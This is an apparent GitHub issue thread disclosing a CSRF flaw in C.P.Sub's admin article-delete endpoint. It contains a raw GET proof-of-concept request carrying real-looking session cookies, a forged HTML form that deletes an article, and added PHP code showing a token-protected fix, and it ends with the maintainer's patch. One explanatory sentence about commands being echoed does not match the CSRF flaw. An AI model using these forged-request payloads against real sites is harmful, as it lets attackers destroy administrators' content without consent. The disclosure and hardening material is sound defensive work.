cooltey / C.P.Sub

PHP Bulletin System with CSV

CSRF - Delete an announcement article arbitrarily #3

Closed KdiagHaci closed 5 years ago

KdiagHaci commented 6 years ago

Hey , C.P.Sub

In your background admin "delete article" section, there is no token verification in the source, which causes CSRF, and the "get" parameter value is very dangerous.

List:

http://website/manage.php?p=article_list

Poc Payload:

GET /manage.php?p=article_del&id=ID HTTP/1.1
Host: your_website
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://127.0.0.1/456/manage.php?p=article_list
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_5c016e8f0f95f039102cbe8366c5c7f3=test%7C1537587372%7CgZf4275f8FC9rh5rffBvPrfPZwQBwSdtTLoKtW1JdQ6%7C4350d349b75ea62d1bbd963b4ee5460a95206b92a5df2dd7899ff7ccdc51bea3; wp-settings-1=mfold%3Do; wp-settings-time-1=1537414573; cerber_groove=49d7bce85e1b8082ab6d6cdf0854abc8; cerber_groove_x_Ad7onvqFrh3GYs8jQ1I24UyDpVRC=G0c9tWNuhQ4Z8azbyspmHrx7fYE5XM; _awtvW=Zqmk3E; gXSlbZOPaVqTWrR=%5DjCLPER7IhSHZkD; tUAnShmrCET=gLvmBVQPSwn; AJeZVoHYa=Gd3nvWzpe; PHPSESSID=hbdcrh6cj6jgl9v4jo5gedbcp6
Connection: close

Poc Payload:

<html>
<head>
<title>CSRF</title>
</head>
<body>

  <script>history.pushState('', '', '/')</script>
    <form action="http://website/manage.php">
      <input type="hidden" name="p" value="article&#95;del" />
      <input type="hidden" name="id" value="2" />
      <input type="submit" value="Hello" />
    </form>

</body>
</html>

You can see that after the parameters are obtained they are spliced directly into the instructions, and the relevant commands are also echoed; there is no rigorous filtering or inspection, which causes the vulnerability:

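The fix the report asks for is to stop performing the delete on a bare GET and to bind each state-changing request to a per-session token that an attacker's page cannot read. The following is an added example written for this issue, not C.P.Sub's own code or its PR: it shows the reported pattern (delete on GET, no token) next to a hardened handler (POST only, token compared in constant time, id validated). The function names, the `$articles` array and the simulated request arrays are assumptions for illustration; a real handler would read `$_SESSION`, `$_POST` and `$_SERVER['REQUEST_METHOD']` instead.

```php
<?php
declare(strict_types=1);

// Added example, not part of the C.P.Sub project. The session is passed in as an
// array so the script can run offline; in manage.php this would be $_SESSION.

// Issue one random token per session and reuse it until the session ends.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Compare the submitted token against the session copy in constant time.
function csrf_verify(array $session, ?string $submitted): bool
{
    if (empty($session['csrf_token']) || $submitted === null) {
        return false;
    }
    return hash_equals($session['csrf_token'], $submitted);
}

// Before (the pattern reported in this issue): any GET with ?p=article_del&id=N
// deletes the article, so a link or image tag on a third-party page is enough.
function article_del_vulnerable(array &$articles, array $get): bool
{
    $id = (int)($get['id'] ?? 0);
    unset($articles[$id]);
    return true;
}

// After: refuse non-POST requests, require a valid token, validate the id.
// Returns a short reason string so the outcome can be checked without a web SAPI.
function article_del_hardened(array &$articles, string $method, array $post, array $session): string
{
    if ($method !== 'POST') {
        return 'rejected: method';          // GET navigations never change state
    }
    if (!csrf_verify($session, $post['csrf_token'] ?? null)) {
        return 'rejected: csrf';            // cross-site form has no token
    }
    $id = filter_var($post['id'] ?? null, FILTER_VALIDATE_INT);
    if ($id === false || !isset($articles[$id])) {
        return 'rejected: id';
    }
    unset($articles[$id]);
    return 'deleted';
}

// The delete control in article_list becomes a POST form carrying the token.
function render_delete_form(int $id, array &$session): string
{
    $token = htmlspecialchars(csrf_token($session), ENT_QUOTES, 'UTF-8');
    return '<form method="post" action="manage.php?p=article_del">'
        . '<input type="hidden" name="csrf_token" value="' . $token . '">'
        . '<input type="hidden" name="id" value="' . $id . '">'
        . '<button type="submit">Delete</button></form>';
}

if (PHP_SAPI === 'cli') {
    // Constructed sample data: three announcements and one logged-in session.
    $articles = [1 => 'Welcome', 2 => 'Maintenance window', 3 => 'New forum rules'];
    $session  = [];
    $token    = csrf_token($session);

    // 1. The PoC request from this issue against the vulnerable handler.
    $copy = $articles;
    article_del_vulnerable($copy, ['id' => '2']);
    echo "vulnerable, forged GET: article 2 present? ", isset($copy[2]) ? 'yes' : 'no', "\n";

    // 2. Same forged GET against the hardened handler.
    $copy = $articles;
    echo "hardened, forged GET:   ", article_del_hardened($copy, 'GET', [], $session), "\n";

    // 3. A cross-site POST form can set p and id but cannot know the token.
    $copy = $articles;
    echo "hardened, forged POST:  ", article_del_hardened($copy, 'POST', ['id' => '2'], $session), "\n";

    // 4. The legitimate admin form submitted from article_list.
    $copy = $articles;
    echo "hardened, admin POST:   ",
        article_del_hardened($copy, 'POST', ['id' => '2', 'csrf_token' => $token], $session), "\n";
    echo "article 2 present afterwards? ", isset($copy[2]) ? 'yes' : 'no', "\n";
}
```

Two points worth noting when applying this. Setting the session cookie to `SameSite=Lax` (via `session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true])` on PHP 7.3 or later) helps, but browsers still attach Lax cookies to top-level GET navigations, which is exactly the request shape in the PoC above; moving the delete to POST is what makes the token check effective. `hash_equals` rather than `==` avoids leaking the token byte by byte through comparison timing.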

cooltey commented 5 years ago

Please check/review the PR to see if it resolves the issue.

KdiagHaci commented 5 years ago

Hey, Cooltey

Thank you for your reply.

I'm sure the problem has been patched up.

Regards,